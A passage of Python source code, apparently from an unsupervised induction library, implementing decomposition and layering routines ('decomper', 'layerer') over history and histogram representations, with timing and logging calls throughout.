aa1 = trim(reduce(uur,fder(ffr1),aar))
decomper_log.info("derived cardinality : %d" % acard(aa1))
zzr = tsgl((stateEmpty(),ffr1))
qq[(stateEmpty(),ffr1)] = (aar,aa1)
(ffr,nnr,kkr) = (None,None,None)
t4 = timer()
decomper_log.info("<<< slicing %.3fs" % (t4-t3))
stdout.flush()
return decomp(uur,zzr,qq,f+1)
if fmax > 0 and f > fmax:
return (uu,zzdf(zztrim(zz)))
decomper_log.info(">>> slice selection")
stdout.flush()
t1 = timer()
mm = []
for (nn,yy) in treesPlaces(zz):
(rr,ff) = nn[-1]
if len(ff) > 0:
(bb,bb1) = qq[(rr,ff)]
tt = dom(treesRoots(yy))
for (ss,a) in aall(red(bb1,fder(ff))):
if a > 0 and ss not in tt:
mm.append((a,(nn,ss,bb)))
decomper_log.info("slices: %d" % len(mm))
if len(mm) == 0:
t2 = timer()
decomper_log.info("<<< slice selection %.3fs" % (t2-t1))
stdout.flush()
return (uu,zzdf(zztrim(zz)))
mm.sort(key = lambda x: x[0])
(a,(nn,ss,bb)) = mm[-1]
cc = hrhrred(select(uu,ss,bb),vars(aa))
decomper_log.info("decomp path length: %d" % len(nn))
decomper_log.info("slice size: %d" % a)
t2 = timer()
decomper_log.info("<<< slice selection %.3fs" % (t2-t1))
stdout.flush()
(uuc,ffc,nnc) = layerer(uu,cc,f)
decomper_log.info(">>> slicing")
stdout.flush()
t3 = timer()
(ac,kkc) = maxd(nnc)
ffc1 = fudEmpty()
if ac > repaRounding:
ffc1 = depends(ffc,kkc)
decomper_log.info("dependent fud cardinality : %d" % len(ffqq(ffc1)))
ccc = apply(uuc,ffc1,cc)
cc1 = trim(reduce(uuc,fder(ffc1),ccc))
decomper_log.info("derived cardinality : %d" % acard(cc1))
qq[(ss,ffc1)] = (ccc,cc1)
zzc = pathsTree(treesPaths(zz) + [nn+[(ss,ffc1)]])
(mm,cc,ffc,nnc,kkc) = (None,None,None,None,None)
t4 = timer()
decomper_log.info("<<< slicing %.3fs" % (t4-t3))
stdout.flush()
return decomp(uuc,zzc,qq,f+1)
if wmax < 0 or lmax < 0 or xmax < 0 or omax < 0 or bmax < 0 or mmax < 1 or umax < 0 or pmax < 0:
return None
if size(aa) == 0 or mult < 1:
return None
if not (vars(aa).issubset(uvars(uu)) and vv.issubset(vars(aa))):
return None
decomper_log.info(">>> decomper")
t1 = timer()
x1 = decomp(uu,emptyTree(),sdict(),1)
decomper_log.info("nodes: %d" % len(treesNodes(dfzz(x1[1]))))
t2 = timer()
decomper_log.info("<<< decomper repa %.3fs" % (t2 - t1))
stdout.flush()
return x1
# parametersSystemsLayererLevelMaxRollByMExcludedSelfHighestIORepa_u ::
# Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer ->
# System -> Set.Set Variable -> Fud ->
# HistoryRepa -> HistogramRepaRed -> HistoryRepa -> HistogramRepaRed -> Integer -> Integer ->
# IO (System, Fud, [(Set.Set Variable, Double)])
def parametersSystemsLayererLevelMaxRollByMExcludedSelfHighestIORepa_u(wmax,lmax,xmax,omax,bmax,mmax,umax,pmax,uu,vvg,ffg,xx,xxp,xxrr,xxrrp,f,g):
repaRounding = 1e-6
def sgl(x):
return sset([x])
def maxr(mm):
if len(mm) > 0:
return list(sset([b for (_,b) in mm]))[-1:][0]
return 0
uvars = systemsSetVar
cart = systemsSetVarsSetStateCartesian_u
lluu = listsSystem_u
uunion = pairSystemsUnion
sunion = pairStatesUnionLeft
ssgl = stateSingleton
llaa = listsHistogram_u
hhvvr = historyRepasVectorVar
apvvr = histogramRepaRedsVectorVar
hrhx = historyRepasRed
def unit(qq):
return llaa([(ss,1) for ss in qq])
tttr = systemsTransformsTransformRepa_u
apply = historyRepasListTransformRepasApply_u
trans = histogramsSetVarsTransform_u
ttpp = transformsPartition
und = transformsUnderlying
qqff = setTransformsFud_u
ffqq = fudsSetTransform
def fder(ff):
und = transformsUnderlying
vv = set()
for (aa,ww) in ff:
vv |= ww
for tt in ff:
vv -= und(tt)
return vv
def fund(ff):
und = transformsUnderlying
vv = set()
for tt in ff:
vv |= und(tt)
for (aa,ww) in ff:
vv -= ww
return vv
def depends(ff,vv):
und = transformsUnderlying
dd = dict([(v,(xx,ww)) for (xx,ww) in ff for v in ww])
yy = set(dd.keys())
def deps(uu,xx):
ff = []
for w in uu & yy - xx:
tt = dd[w]
ff.append(tt)
zz = xx.copy()
zz.add(w)
ff = ff + deps(und(tt),zz)
return ff
return set(deps(vv,set()))
def funion(ff,gg):
return qqff(ffqq(ff) | ffqq(gg))
def buildfftup(uu,vvg,ffg,ff,hh,hhp,hhrr,hhrrp):
return parametersSystemsBuilderTupleLevelNoSumlayerMultiEffectiveRepa_ui(xmax,omax,bmax,mmax,uu,vvg,ffg,ff,hh,hhp,hhrr,hhrrp)
def parter(uu,kk,bb,y1):
return parametersSystemsPartitionerMaxRollByMRepa_ui(mmax,umax,pmax,uu,kk,bb,y1)
def roller(qq):
return parametersRollerMaximumRollExcludedSelfRepa_i(qq)
def buildffdervar(uu,vv,ffg,ff,xx,xxp,xxrr,xxrrp):
(x1,s1) = parametersSystemsBuilderDerivedVarsLevelHighestNoSumlayerRepa_ui(wmax,omax,uu,vv,ffg,ff,xx,xxp,xxrr,xxrrp)
return ([(kk,a) for ((kk,_,_),a) in x1],s1)
def layer(uu,ff,mm,xx,xxp,xxrr,xxrrp,l):
if l > lmax:
return (uu,ff,mm)
layerer_log.info(">>> layer\tfud: %d\tlevel node: %d\tlayer: %d" % (f,g,l))
t1 = timer()
tupler_log.info(">>> tupler")
tupler_log.info("level substrate cardinality: %d" % len(vvg))
tupler_log.info("level fud derived cardinality: %d" % len(fder(ffg)))
tupler_log.info("fud cardinality: %d" % len(ffqq(ff)))
tupler_log.info("level excluded fud cardinality: %d" % len(ffqq(ff)-ffqq(ffg)))
stdout.flush()
(x2,s2) = buildfftup(uu,vvg,ffg,ff,xx,xxp,xxrr,xxrrp)
if len(x2) > 0:
tupler_log.info("tuple cardinality: %d" % len(x2))
tupler_log.info("max tuple algn: %.2f" % max([b for (a,b) in x2]))
else:
tupler_log.info("no tuples")
t2 = timer()
tupler_log.info("tupler\tsearched: %d\trate: %.2f" % (s2,s2/(t2-t1)))
tupler_log.info("<<< tupler %.3fs" % (t2-t1))
parter_log.info(">>> parter")
stdout.flush()
y3 = [parter(uu,kk,bb,y1) for ((kk,bb),y1) in x2]
x3 = [x for (ll,_) in y3 for x in ll]
s3 = sum([s for (_,s) in y3])
if len(x3) > 0:
parter_log.info("partitions cardinality: %d" % len(x3))
else:
parter_log.info("no tuple partitions")
t3 = timer()
parter_log.info("parter\tsearched: %d\trate: %.2f" % (s3,s3/(t3-t2)))
parter_log.info("<<< parter %.3fs" % (t3-t2))
roller_log.info(">>> roller")
stdout.flush()
y4 = [roller(qq) for qq in x3]
x4 = [x for (ll,_) in y4 for x in ll]
s4 = sum([s for (_,s) in y4])
if len(x4) > 0:
roller_log.info("roll cardinality: %d" % len(x4))
else:
roller_log.info("no rolls")
t4 = timer()
roller_log.info("roller\tsearched: %d\trate: %.2f" % (s4,s4/(t4-t3)))
roller_log.info("<<< roller %.3fs" % (t4-t3))
applier_log.info(">>> application")
stdout.flush()
ll0 = []
for (yy,pp) in x4:
for (jj,p) in zip(yy,pp):
if max(p) + 1 < len(p):
ii = list(zip(cart(uu,jj),p))
ll0.append(ii)
ll = []
for (b,ii) in enumerate(ll0):
w = VarPair((VarPair((VarPair((VarInt(f),VarInt(g))),VarInt(l))),VarInt(b+1)))
ww = sset([ValInt(u) for (_,u) in ii])
tt = trans(unit([sunion(ss,ssgl(w,ValInt(u))) for (ss,u) in ii]),sgl(w))
ll.append((tt,(w,ww)))
ll1 = []
for (tt,(w,ww)) in ll:
if all([len(ww) != len(ww1) or und(tt) != und(tt1) or ttpp(tt) != ttpp(tt1) for (tt1,(w1,ww1)) in ll if w > w1]):
ll1.append((tt,(w,ww)))
if len(ll1) > 0:
hh = qqff(sset([tt for (tt,_) in ll1]))
uu1 = uunion(uu,lluu([(w,ww) for (_,(w,ww)) in ll1]))
ffr = [tttr(uu1,tt) for (tt,_) in ll1]
xx1 = apply(xx,ffr)
xxp1 = hrhx(xx1)
xxrr1 = apply(xxrr,ffr)
xxrrp1 = hrhx(xxrr1)
gg = funion(funion(ff,hh),depends(ffg,fund(hh)))
applier_log.info("fud cardinality: %d" % len(ffqq(gg)))
t5 = timer()
applier_log.info("<<< application %.3fs" % (t5-t4))
dervarser_log.info( ">>> dervarser")
stdout.flush()
(mm1,s5) = buildffdervar(uu1,vvg,ffg,gg,xx1,xxp1,xxrr1,xxrrp1)
if len(mm1) > 0:
dervarser_log.info("der vars algn density: %.2f" % maxr(mm1))
else:
dervarser_log.info("no der vars sets")
t6 = timer()
dervarser_log.info("dervarser\tsearched: %d\trate: %.2f" % (s5,s5/(t6-t5)))
dervarser_log.info("<<< dervarser %.3fs" % (t6-t5))
layerer_log.info( "<<< layer %.3fs" % (t6-t1))
stdout.flush()
if l <= lmax and (len(mm) == 0 or maxr(mm1) > maxr(mm) + repaRounding):
(ffr,ll0,ll,ll1) = (None,None,None,None)
(x2,x3,x4) = (None,None,None)
return layer(uu1,gg,mm1,xx1,xxp1,xxrr1,xxrrp1,l+1)
else:
t5 = timer()
applier_log.info("<<< application %.3fs" % (t5-t4))
layerer_log.info( "<<< layer %.3fs" % (t5-t1))
stdout.flush()
return (uu,ff,mm)
layerer_log.info(">>> layerer")
t1 = timer()
x1 = layer(uu,fudEmpty(),[],xx,xxp,xxrr,xxrrp,1)
t2 = timer()
layerer_log.info("<<< layerer %.3fs" % (t2-t1))
stdout.flush()
return x1
# parametersSystemsLayererLevelMaxRollByMExcludedSelfHighestIORepa_u_1 ::
# Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer ->
# System -> Set.Set Variable -> Fud ->
# HistoryRepa -> HistogramRepaRed -> HistoryRepa -> HistogramRepaRed -> Integer -> Integer ->
# IO (System, Fud, [(Set.Set Variable, Double)])
def parametersSystemsLayererLevelMaxRollByMExcludedSelfHighestIORepa_u_1(wmax,lmax,xmax,omax,bmax,mmax,umax,pmax,uu,vvg,ffg,xx,xxp,xxrr,xxrrp,f,g):
repaRounding = 1e-6
def sgl(x):
return sset([x])
def maxr(mm):
if len(mm) > 0:
return list(sset([b for (_,b) in mm]))[-1:][0]
return 0
uvars = systemsSetVar
cart = systemsSetVarsSetStateCartesian_u
lluu = listsSystem_u
uunion = pairSystemsUnion
sunion = pairStatesUnionLeft
ssgl = stateSingleton
llaa = listsHistogram_u
hhvvr = historyRepasVectorVar
apvvr = histogramRepaRedsVectorVar
hrhx = historyRepasRed
def unit(qq):
return llaa([(ss,1) for ss in qq])
tttr = systemsTransformsTransformRepa_u
apply = historyRepasListTransformRepasApply_u
trans = histogramsSetVarsTransform_u
ttpp = transformsPartition
und = transformsUnderlying
qqff = setTransformsFud_u
ffqq = fudsSetTransform
fund = fudsUnderlying
fder = fudsDerived
depends = fudsSetVarsDepends
def funion(ff,gg):
return qqff(ffqq(ff) | ffqq(gg))
def buildfftup(uu,vvg,ffg,ff,hh,hhp,hhrr,hhrrp):
return parametersSystemsBuilderTupleLevelNoSumlayerMultiEffectiveRepa_ui(xmax,omax,bmax,mmax,uu,vvg,ffg,ff,hh,hhp,hhrr,hhrrp)
def parter(uu,kk,bb,y1):
return parametersSystemsPartitionerMaxRollByMRepa_ui(mmax,umax,pmax,uu,kk,bb,y1)
def roller(qq):
return parametersRollerMaximumRollExcludedSelfRepa_i(qq)
def buildffdervar(uu,vv,ffg,ff,xx,xxp,xxrr,xxrrp):
(x1,s1) = parametersSystemsBuilderDerivedVarsLevelHighestNoSumlayerRepa_ui(wmax,omax,uu,vv,ffg,ff,xx,xxp,xxrr,xxrrp)
return ([(kk,a) for ((kk,_,_),a) in x1],s1)
def layer(uu,ff,mm,xx,xxp,xxrr,xxrrp,l):
if l > lmax:
return (uu,ff,mm)
layerer_log.info(">>> layer\tfud: %d\tlevel node: %d\tlayer: %d" % (f,g,l))
t1 = timer()
tupler_log.info(">>> tupler")
tupler_log.info("level substrate cardinality: %d" % len(vvg))
tupler_log.info("level fud derived cardinality: %d" % len(fder(ffg)))
tupler_log.info("fud cardinality: %d" % len(ffqq(ff)))
tupler_log.info("level excluded fud cardinality: %d" % len(ffqq(ff)-ffqq(ffg)))
stdout.flush()
(x2,s2) = buildfftup(uu,vvg,ffg,ff,xx,xxp,xxrr,xxrrp)
if len(x2) > 0:
tupler_log.info("tuple cardinality: %d" % len(x2))
tupler_log.info("max tuple algn: %.2f" % max([b for (a,b) in x2]))
else:
tupler_log.info("no tuples")
t2 = timer()
tupler_log.info("tupler\tsearched: %d\trate: %.2f" % (s2,s2/(t2-t1)))
tupler_log.info("<<< tupler %.3fs" % (t2-t1))
parter_log.info(">>> parter")
stdout.flush()
y3 = [parter(uu,kk,bb,y1) for ((kk,bb),y1) in x2]
x3 = [x for (ll,_) in y3 for x in ll]
s3 = sum([s for (_,s) in y3])
if len(x3) > 0:
parter_log.info("partitions cardinality: %d" % len(x3))
else:
parter_log.info("no tuple partitions")
t3 = timer()
parter_log.info("parter\tsearched: %d\trate: %.2f" % (s3,s3/(t3-t2)))
parter_log.info("<<< parter %.3fs" % (t3-t2))
roller_log.info(">>> roller")
stdout.flush()
y4 = [roller(qq) for qq in x3]
x4 = [x for (ll,_) in y4 for x in ll]
s4 = sum([s for (_,s) in y4])
if len(x4) > 0:
roller_log.info("roll cardinality: %d" % len(x4))
else:
roller_log.info("no rolls")
t4 = timer()
roller_log.info("roller\tsearched: %d\trate: %.2f" % (s4,s4/(t4-t3)))
roller_log.info("<<< roller %.3fs" % (t4-t3))
applier_log.info(">>> application")
stdout.flush()
ll0 = []
for (yy,pp) in x4:
for (jj,p) in zip(yy,pp):
if max(p) + 1 < len(p):
ii = list(zip(cart(uu,jj),p))
ll0.append(ii)
ll = []
for (b,ii) in enumerate(ll0):
w = VarPair((VarPair((VarPair((VarInt(f),VarInt(g))),VarInt(l))),VarInt(b+1)))
ww = sset([ValInt(u) for (_,u) in ii])
tt = trans(unit([sunion(ss,ssgl(w,ValInt(u))) for (ss,u) in ii]),sgl(w))
ll.append((tt,(w,ww)))
ll1 = []
for (tt,(w,ww)) in ll:
if all([len(ww) != len(ww1) or und(tt) != und(tt1) or ttpp(tt) != ttpp(tt1) for (tt1,(w1,ww1)) in ll if w > w1]):
ll1.append((tt,(w,ww)))
if len(ll1) > 0:
hh = qqff(sset([tt for (tt,_) in ll1]))
uu1 = uunion(uu,lluu([(w,ww) for (_,(w,ww)) in ll1]))
ffr = [tttr(uu1,tt) for (tt,_) in ll1]
xx1 = apply(xx,ffr)
xxp1 = hrhx(xx1)
xxrr1 = apply(xxrr,ffr)
xxrrp1 = hrhx(xxrr1)
gg = funion(funion(ff,hh),depends(ffg,fund(hh)))
applier_log.info("fud cardinality: %d" % len(ffqq(gg)))
t5 = timer()
applier_log.info("<<< application %.3fs" % (t5-t4))
dervarser_log.info( ">>> dervarser")
stdout.flush()
(mm1,s5) = buildffdervar(uu1,vvg,ffg,gg,xx1,xxp1,xxrr1,xxrrp1)
if len(mm1) > 0:
dervarser_log.info("der vars algn density: %.2f" % maxr(mm1))
else:
dervarser_log.info("no der vars sets")
t6 = timer()
dervarser_log.info("dervarser\tsearched: %d\trate: %.2f" % (s5,s5/(t6-t5)))
dervarser_log.info("<<< dervarser %.3fs" % (t6-t5))
layerer_log.info( "<<< layer %.3fs" % (t6-t1))
stdout.flush()
if l <= lmax and (len(mm) == 0 or maxr(mm1) > maxr(mm) + repaRounding):
(ffr,ll0,ll,ll1) = (None,None,None,None)
(x2,x3,x4) = (None,None,None)
return layer(uu1,gg,mm1,xx1,xxp1,xxrr1,xxrrp1,l+1)
else:
t5 = timer()
applier_log.info("<<< application %.3fs" % (t5-t4))
layerer_log.info( "<<< layer %.3fs" % (t5-t1))
stdout.flush()
return (uu,ff,mm)
layerer_log.info(">>> layerer")
t1 = timer()
x1 = layer(uu,fudEmpty(),[],xx,xxp,xxrr,xxrrp,1)
t2 = timer()
layerer_log.info("<<< layerer %.3fs" % (t2-t1))
stdout.flush()
return x1
# parametersSystemsHistoryRepasDecomperLevelMaxRollByMExcludedSelfHighestFmaxIORepa ::
# Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer ->
# Integer -> Integer ->
# System -> Tree (Integer, Set.Set Variable, Fud) -> HistoryRepa ->
# IO (Maybe (System, DecompFud))
def parametersSystemsHistoryRepasDecomperLevelMaxRollByMExcludedSelfHighestFmaxIORepa(wmax,lmax,xmax,omax,bmax,mmax,umax,pmax,fmax,mult,seed,uu,zzg,aa):
repaRounding = 1e-6
dom = relationsDomain
def maxd(mm):
if len(mm) > 0:
return list(sset([(b,a) for (a,b) in mm]))[-1]
return (0,sset())
def tsgl(r):
return sdict([(r,sdict())])
uvars = systemsSetVar
acard = histogramsCardinality
trim = histogramsTrim
aall = histogramsList
def red(aa,vv):
return setVarsHistogramsReduce(vv,aa)
def unit(ss):
return setStatesHistogramUnit(sset([ss]))
qqff = setTransformsFud_u
ffqq = fudsSetTransform
def fder(ff):
und = transformsUnderlying
vv = set()
for (aa,ww) in ff:
vv |= ww
for tt in ff:
vv -= und(tt)
return vv
def fvars(ff):
vars = histogramsSetVar
vv = set()
for (aa,ww) in ff:
vv |= vars(aa)
return vv
def fund(ff):
und = transformsUnderlying
vv = set()
for tt in ff:
vv |= und(tt)
for (aa,ww) in ff:
vv -= ww
return vv
def funion(ff,gg):
return qqff(ffqq(ff) | ffqq(gg))
aahh = histogramsHistory
hhhr = systemsHistoriesHistoryRepa
def vars(hr):
return sset(historyRepasVectorVar(hr))
size = historyRepasSize
rraa = systemsHistogramRepasHistogram
hrhx = historyRepasRed
def hrhrred(hr,vv):
return setVarsHistoryRepasHistoryRepaReduced(vv,hr)
def hrred(hr,vv):
return setVarsHistoryRepasReduce(1,vv,hr)
def reduce(uu,ww,hh):
return rraa(uu,hrred(hh,ww))
def select(uu,ss,hh):
return historyRepasHistoryRepasHistoryRepaSelection_u(hhhr(uu,aahh(unit(ss))),hh)
hrconcat = vectorHistoryRepasConcat_u
hrshuffle = historyRepasShuffle_u
ffqq = fudsSetTransform
tttr = systemsTransformsTransformRepa_u
def ltrsort(uu,ff,hr):
vars = historyRepasVectorVar
return listVariablesListTransformRepasSort(vars(hr),[tttr(uu,tt) for tt in ffqq(ff)])
ltrmul = historyRepasListTransformRepasApply_u
def apply(uu,ff,hr):
return historyRepasListTransformRepasApply(hr,[tttr(uu,tt) for tt in ffqq(ff)])
depends = fudsSetVarsDepends
zzdf = treePairStateFudsDecompFud
dfzz = decompFudsTreePairStateFud
def zztrim(df):
pp = []
for ll in treesPaths(df):
(_,ff) = ll[-1]
if len(ff) == 0:
pp.append(ll[:-1])
else:
pp.append(ll)
return pathsTree(pp)
def okLevel(zzg):
for (wmaxg,vvg,ffg) in treesElements(zzg):
if wmaxg < 0:
return False
if not vvg.issubset(vars(aa)):
return False
if not fvars(ffg).issubset(uvars(uu)):
return False
if not fund(ffg).issubset(vars(aa)):
return False
return True
def layerer(wmax,uu,vvg,ffg,xx,f,g):
decomper_log.info(">>> repa shuffle")
stdout.flush()
t1 = timer()
z = size(xx)
xxrr = hrconcat([hrshuffle(xx,seed+i*z) for i in range(1,mult+1)])
t2 = timer()
decomper_log.info("<<< repa shuffle %.3fs" % (t2-t1))
decomper_log.info(">>> repa perimeters")
stdout.flush()
t1 = timer()
vv1 = fder(ffg) | vvg
frg = ltrsort(uu,ffg,xx)
xx1 = hrhrred(ltrmul(xx,frg),vv1)
xxp = hrhx(xx1)
xxrr1 = hrhrred(ltrmul(xxrr,frg),vv1)
xxrrp = hrhx(xxrr1)
t2 = timer()
decomper_log.info("<<< repa perimeters %.3fs" % (t2-t1))
return parametersSystemsLayererLevelMaxRollByMExcludedSelfHighestIORepa_u(wmax,lmax,xmax,omax,bmax,mmax,umax,pmax,uu,vvg,ffg,xx1,xxp,xxrr1,xxrrp,f,g)
def level(uu,aa,ttg,f,g):
(uu0,ff0,g0) = (uu,fudEmpty(),g)
for ((wmaxg,vvg,ffg),xxg) in ttg.items():
(uuh,ffh,gh) = level(uu0,aa,xxg,f,g0)
(uu1,gg,nn) = layerer(wmaxg,uuh,vvg,funion(ffg,ffh),aa,f,gh)
(a,kk) = maxd(nn)
gg1 = fudEmpty()
if a > repaRounding:
gg1 = depends(gg,kk)
(uu0,ff0,g0) = (uu1,funion(ff0,gg1),gh+1)
return (uu0,ff0,g0)
def decomp(uu,zz,qq,f):
if len(zz) == 0:
(uur,ffr,_) = level(uu,aa,zzg,f,1)
if len(ffr) == 0:
return (uu, decompFudEmpty())
decomper_log.info(">>> slicing")
stdout.flush()
t3 = timer()
decomper_log.info("dependent fud cardinality : %d" % len(ffqq(ffr)))
aar = apply(uur,ffr,aa)
wwr = sset(fder(ffr))
aa1 = trim(reduce(uur,wwr,aar))
decomper_log.info("derived cardinality : %d" % acard(red(aa1,wwr)))
zzr = tsgl((stateEmpty(),ffr))
qq[(stateEmpty(),ffr)] = (aar,aa1)
(ffr,nnr,kkr) = (None,None,None)
t4 = timer()
decomper_log.info("<<< slicing %.3fs" % (t4-t3))
stdout.flush()
return decomp(uur,zzr,qq,f+1)
if fmax > 0 and f > fmax:
return (uu,zzdf(zztrim(zz)))
decomper_log.info(">>> slice selection")
stdout.flush()
t1 = timer()
mm = []
for (nn,yy) in treesPlaces(zz):
(rr,ff) = nn[-1]
if len(ff) > 0:
(bb,bb1) = qq[(rr,ff)]
tt = dom(treesRoots(yy))
for (ss,a) in aall(red(bb1,fder(ff))):
if a > 0 and ss not in tt:
mm.append((a,(nn,ss,bb)))
decomper_log.info("slices: %d" % len(mm))
if len(mm) == 0:
t2 = timer()
decomper_log.info("<<< slice selection %.3fs" % (t2-t1))
stdout.flush()
return (uu,zzdf(zztrim(zz)))
mm.sort(key = lambda x: x[0])
(a,(nn,ss,bb)) = mm[-1]
cc = hrhrred(select(uu,ss,bb),vars(aa))
decomper_log.info("decomp path length: %d" % len(nn))
decomper_log.info("slice size: %d" % a)
t2 = timer()
decomper_log.info("<<< slice selection %.3fs" % (t2-t1))
stdout.flush()
(uuc,ffc,_) = level(uu,cc,zzg,f,1)
decomper_log.info(">>> slicing")
stdout.flush()
t3 = timer()
decomper_log.info("dependent fud cardinality : %d" % len(ffqq(ffc)))
wwc = sset(fder(ffc))
ccc = apply(uuc,ffc,cc)
cc1 = trim(reduce(uuc,wwc,ccc))
decomper_log.info("derived cardinality : %d" % acard(red(cc1,wwc)))
qq[(ss,ffc)] = (ccc,cc1)
zzc = pathsTree(treesPaths(zz) + [nn+[(ss,ffc)]])
(mm,cc,ffc,nnc,kkc) = (None,None,None,None,None)
t4 = timer()
decomper_log.info("<<< slicing %.3fs" % (t4-t3))
stdout.flush()
return decomp(uuc,zzc,qq,f+1)
if wmax < 0 or lmax < 0 or xmax < 0 or omax < 0 or bmax < 0 or mmax < 1 or umax < 0 or pmax < 0:
return None
if size(aa) == 0 or mult < 1:
return None
if not vars(aa).issubset(uvars(uu)):
return None
if not okLevel(zzg):
return None
decomper_log.info(">>> decomper")
t1 = timer()
x1 = decomp(uu,emptyTree(),sdict(),1)
decomper_log.info("nodes: %d" % len(treesNodes(dfzz(x1[1]))))
t2 = timer()
decomper_log.info("<<< decomper repa %.3fs" % (t2 - t1))
stdout.flush()
return x1
# parametersSystemsHistoryRepasDecomperLevelMaxRollByMExcludedSelfHighestFmaxIORepa_1 ::
# Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer ->
# Integer -> Integer ->
# System -> Tree (Integer, Set.Set Variable, Fud) -> HistoryRepa ->
# IO (Maybe (System, DecompFud))
def parametersSystemsHistoryRepasDecomperLevelMaxRollByMExcludedSelfHighestFmaxIORepa_1(wmax,lmax,xmax,omax,bmax,mmax,umax,pmax,fmax,mult,seed,uu,zzg,aa):
repaRounding = 1e-6
dom = relationsDomain
def maxd(mm):
if len(mm) > 0:
return list(sset([(b,a) for (a,b) in mm]))[-1]
return (0,sset())
def tsgl(r):
return sdict([(r,sdict())])
uvars = systemsSetVar
acard = histogramsCardinality
trim = histogramsTrim
aall = histogramsList
def red(aa,vv):
return setVarsHistogramsReduce(vv,aa)
def unit(ss):
return setStatesHistogramUnit(sset([ss]))
qqff = setTransformsFud_u
ffqq = fudsSetTransform
fvars = fudsVars
fder = fudsDerived
fund = fudsUnderlying
def funion(ff,gg):
return qqff(ffqq(ff) | ffqq(gg))
aahh = histogramsHistory
hhhr = systemsHistoriesHistoryRepa
def vars(hr):
return sset(historyRepasVectorVar(hr))
size = historyRepasSize
rraa = systemsHistogramRepasHistogram
hrhx = historyRepasRed
def hrhrred(hr,vv):
return setVarsHistoryRepasHistoryRepaReduced(vv,hr)
def hrred(hr,vv):
return setVarsHistoryRepasReduce(1,vv,hr)
def reduce(uu,ww,hh):
return rraa(uu,hrred(hh,ww))
def select(uu,ss,hh):
return historyRepasHistoryRepasHistoryRepaSelection_u(hhhr(uu,aahh(unit(ss))),hh)
hrconcat = vectorHistoryRepasConcat_u
hrshuffle = historyRepasShuffle_u
ffqq = fudsSetTransform
fder = fudsDerived
tttr = systemsTransformsTransformRepa_u
def apply(uu,ff,hh):
return historyRepasListTransformRepasApply(hh,[tttr(uu,tt) for tt in ffqq(ff)])
depends = fudsSetVarsDepends
zzdf = treePairStateFudsDecompFud
dfzz = decompFudsTreePairStateFud
def zztrim(df):
pp = []
for ll in treesPaths(df):
(_,ff) = ll[-1]
if len(ff) == 0:
pp.append(ll[:-1])
else:
pp.append(ll)
return pathsTree(pp)
def okLevel(zzg):
for (wmaxg,vvg,ffg) in treesElements(zzg):
if wmaxg < 0:
return False
if not vvg.issubset(vars(aa)):
return False
if not fvars(ffg).issubset(uvars(uu)):
return False
if not fund(ffg).issubset(vars(aa)):
return False
return True
def layerer(wmax,uu,vvg,ffg,xx,f,g):
decomper_log.info(">>> repa shuffle")
stdout.flush()
t1 = timer()
z = size(xx)
xxrr = hrconcat([hrshuffle(xx,seed+i*z) for i in range(1,mult+1)])
t2 = timer()
decomper_log.info("<<< repa shuffle %.3fs" % (t2-t1))
decomper_log.info(">>> repa perimeters")
stdout.flush()
t1 = timer()
xx1 = apply(uu,ffg,xx)
xxp = hrhx(xx1)
xxrr1 = apply(uu,ffg,xxrr)
xxrrp = hrhx(xxrr1)
t2 = timer()
decomper_log.info("<<< repa perimeters %.3fs" % (t2-t1))
return parametersSystemsLayererLevelMaxRollByMExcludedSelfHighestIORepa_u(wmax,lmax,xmax,omax,bmax,mmax,umax,pmax,uu,vvg,ffg,xx1,xxp,xxrr1,xxrrp,f,g)
def level(uu,aa,ttg,f,g):
(uu0,ff0,g0) = (uu,fudEmpty(),g)
for ((wmaxg,vvg,ffg),xxg) in ttg.items():
(uuh,ffh,gh) = level(uu0,aa,xxg,f,g0)
(uu1,gg,nn) = layerer(wmaxg,uuh,vvg,funion(ffg,ffh),aa,f,gh)
(a,kk) = maxd(nn)
gg1 = fudEmpty()
if a > repaRounding:
gg1 = depends(gg,kk)
(uu0,ff0,g0) = (uu1,funion(ff0,gg1),gh+1)
return (uu0,ff0,g0)
def decomp(uu,zz,qq,f):
if len(zz) == 0:
(uur,ffr,_) = level(uu,aa,zzg,f,1)
if len(ffr) == 0:
return (uu, decompFudEmpty())
decomper_log.info(">>> slicing")
stdout.flush()
t3 = timer()
decomper_log.info("dependent fud cardinality : %d" % len(ffqq(ffr)))
aar = apply(uur,ffr,aa)
wwr = fder(ffr)
aa1 = trim(reduce(uur,wwr,aar))
decomper_log.info("derived cardinality : %d" % acard(red(aa1,wwr)))
zzr = tsgl((stateEmpty(),ffr))
qq[(stateEmpty(),ffr)] = (aar,aa1)
(ffr,nnr,kkr) = (None,None,None)
t4 = timer()
decomper_log.info("<<< slicing %.3fs" % (t4-t3))
stdout.flush()
return decomp(uur,zzr,qq,f+1)
if fmax > 0 and f > fmax:
return (uu,zzdf(zztrim(zz)))
decomper_log.info(">>> slice selection")
stdout.flush()
t1 = timer()
mm = []
for (nn,yy) in treesPlaces(zz):
(rr,ff) = nn[-1]
if len(ff) > 0:
(bb,bb1) = qq[(rr,ff)]
tt = dom(treesRoots(yy))
for (ss,a) in aall(red(bb1,fder(ff))):
if a > 0 and ss not in tt:
mm.append((a,(nn,ss,bb)))
decomper_log.info("slices: %d" % len(mm))
if len(mm) == 0:
t2 = timer()
decomper_log.info("<<< slice selection %.3fs" % (t2-t1))
stdout.flush()
return (uu,zzdf(zztrim(zz)))
mm.sort(key = lambda x: x[0])
(a,(nn,ss,bb)) = mm[-1]
cc = hrhrred(select(uu,ss,bb),vars(aa))
decomper_log.info("decomp path length: %d" % len(nn))
decomper_log.info("slice size: %d" % a)
t2 = timer()
decomper_log.info("<<< slice selection %.3fs" % (t2-t1))
stdout.flush()
(uuc,ffc,_) = level(uu,cc,zzg,f,1)
decomper_log.info(">>> slicing")
stdout.flush()
t3 = timer()
decomper_log.info("dependent fud cardinality : %d" % len(ffqq(ffc)))
wwc = fder(ffc)
ccc = apply(uuc,ffc,cc)
cc1 = trim(reduce(uuc,wwc,ccc))
decomper_log.info("derived cardinality : %d" % acard(red(cc1,wwc)))
qq[(ss,ffc)] = (ccc,cc1)
zzc = pathsTree(treesPaths(zz) + [nn+[(ss,ffc)]])
(mm,cc,ffc,nnc,kkc) = (None,None,None,None,None)
t4 = timer()
decomper_log.info("<<< slicing %.3fs" % (t4-t3))
stdout.flush()
return decomp(uuc,zzc,qq,f+1)
